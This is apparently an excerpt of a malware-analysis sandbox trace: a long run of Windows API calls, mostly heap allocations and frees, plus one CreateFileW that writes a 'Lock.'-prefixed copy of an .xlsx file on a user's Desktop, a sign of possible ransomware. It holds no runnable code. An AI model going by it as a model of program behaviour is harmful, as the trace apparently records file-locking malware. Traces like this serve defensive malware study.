HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.791] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0187.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.792] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0187.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.793] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0187.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0187.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.lorGIZR7_Ai6fNrX6f.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.lorgizr7_ai6fnrx6f.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a8 [0187.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0187.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0187.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.796] SetFilePointerEx (in: hFile=0x2a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0187.796] ReadFile (in: hFile=0x2a4, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x58b8, lpOverlapped=0x0) returned 1 [0187.798] ReadFile (in: hFile=0x2a4, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0187.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0187.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0187.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.799] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.799] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.800] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.800] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0187.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0187.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x58b8) returned 0x34a2048 [0187.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0187.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2db8 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0187.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x58b8) returned 0x24dd318 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0187.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0187.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0187.802] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0187.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0187.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.803] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0187.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0187.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0187.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0187.803] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0187.803] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0187.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.804] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0187.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0187.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0187.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0187.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0187.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0187.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0187.807] 